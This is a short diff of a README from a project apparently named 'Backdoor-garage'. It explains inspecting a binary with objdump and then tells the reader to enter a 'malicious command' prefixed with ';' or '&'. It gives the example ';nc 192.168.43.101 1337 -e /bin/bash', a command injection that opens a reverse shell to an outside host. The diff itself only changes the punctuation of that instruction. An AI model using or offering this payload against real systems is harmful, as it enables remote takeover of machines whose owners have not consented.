cipher1234/Backdoor-garage/README.md

 ```bash
 objdump -s -j .rodata binary_name
 ```
 Next the program will ask you to enter the malicious command .
-Make sure you add ;or& before your command.
+Make sure you add "; or &" before your command.
 ```bash
 ;nc 192.168.43.101 1337 -e /bin/bash
 ```